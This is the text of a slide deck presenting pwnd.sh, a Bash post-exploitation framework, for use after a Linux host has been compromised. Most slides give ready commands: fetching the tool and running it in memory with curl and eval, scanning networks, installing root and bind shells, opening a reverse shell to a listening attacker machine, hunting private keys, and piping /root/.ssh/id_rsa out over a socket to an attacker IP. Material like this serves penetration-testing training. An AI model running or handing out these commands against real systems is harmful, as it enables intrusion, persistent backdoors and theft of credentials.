Upcoming SlideShare
pwnd.sh
- 1. PWND.sh Post Exploitation Framework
- 2. Agenda SCENARIO: Have already compromised a Linux machine What’s next after exploiting Different functionalities of pwnd.sh Q/A
- 3. ./about_me.py [+] Got name : Chandrapal [+] Website : chandrapal.me [+] Founder of : Hack with GitHub [+] Social Accounts : @bnchandrapal @HackwithGithub [-] Life : Traceback (most recent call last) : File “about_me.py”, line 150, in <module> TypeError: Can’t convert ‘infosec’ object to developer implicitly
- 4. Author Itzek Kotler (@itzikkotler) CTO & Co-founder @ SafeBreach http://ikotler.org
- 5. What plans in Post Exploitation Phase 3 possible things: ● Further penetrate into Network / Endpoints ● Get a firmer foothold on the Network / Endpoints ● Start Exfiltrating Data out of the Network / Endpoints
- 6. About the tool ● Newly released ● Easy as it is written in BASH ● Interactive and allows to create custom scripts ● License: 3-Clause BSD ● Both In-Memory and On-Disk deployment available ● Pipeline integrates pwnd.sh with other programs also
- 7. How can I get it ? > git clone https://github.com/SafeBreach-Labs/pwndsh.git > cd pwndsh
- 8. Why Bash and not Python / Perl / Ruby ? ● Same Bash for different Platforms (Mac, Linux, etc) and different architectures (x86, x64) ● It is the default shell on most systems ● There is socket programming in Bash (--enable-net-redirections) ● You cannot fallback to Bash from Python, Perl, etc but you can UPGRADE to Python, Perl, etc from Bash
- 9. Dependencies, or not to be Depended? ● No: – Consistent functionality across different Platforms, CPUs etc. – Smaller and simpler code base ● Yes: – Don't reinvent the wheel – Everything a Dependency in Shell Terms (ls, cat, etc) (Good coders create, Great coders reuse) PWND.SH – built with least amount of dependencies
- 10. Why In-memory? ● Constraints found: – Filesystem is readonly – “No space left on device” Solution: In-memory loading ● Works even if the Filesystem is mounted to be Read-only ● Multiple Versions can co-exists (in Multiple Shells) ● Disappears after Reboot
- 11. Let’s Start
- 12. Metasploitable 192.168.70.101 Ubuntu Find it It’s me 192.168.70.100 Scenario :
- 13. In-Memory Loading Method #1 X=`curl -fsSL "https://raw.githubusercontent.com/SafeBreac h-Labs/pwndsh/master/bin/pwnd.sh"` eval "$X"
- 14. What if the system is on Intranet without Internet ? What if the system is in Internet Censored country where GitHub is blocked ?
- 15. In-Memory Loading Method #2 ● On source computer curl -fsSL "https://raw.githubusercontent.com/SafeBreach- Labs/pwndsh/master/bin/pwnd.sh" < Ctrl+Shift+C > ● On destination computer X=”<Ctrl+V>” eval “$X”
- 16. On-Disk Loading Method > curl -OfsSL "https://raw.githubusercontent.com/SafeBrea ch-Labs/pwndsh/master/bin/pwnd.sh" > source pwnd.sh
- 17. Scanning a Host (pwnd) $ portscanner 192.168.2.132 22/tcp
- 18. Scanning Networks (pwnd)$ for ip in $(seq 1 254); do portscanner 192.168.0.$ip 123/udp; done
- 19. Local Backdoor Example (pwnd)$ install_rootshell # Remember to invoke rootshell with ‘-p’
- 20. Remote Backdoor Example (pwnd)$ bindshell 1234 # Connect to host at 1234/tcp for rootshell
- 21. Remote Backdoor Example #2 # On 192.168.2.1 run: nc –l 1234 (pwnd)$ reverseshell 192.168.2.1 1234
- 22. Searching for Goodies (pwnd)$ hunt_privkeys
- 23. Exfil Example # On attacker machine run: nc –l <port> (pwnd)$ cat /root/.ssh/id_rsa | base64 | over_socket <attacker IP> <port>
- 24. Plugin Support ● You can create plugins and add you to the project ● All you need is: – GitHub account – Bash knowledge – Time
- 25. Q&A We have HACKED WITH GITHUB
- 26. References ● https://github.com/SafeBreach-Labs/pwndsh ● http://www.ikotler.org/JustGotPWND.pdf ● https://www.youtube.com/watch?v=kWU-fDv2wjM
- 27. Thank You
Login to see the comments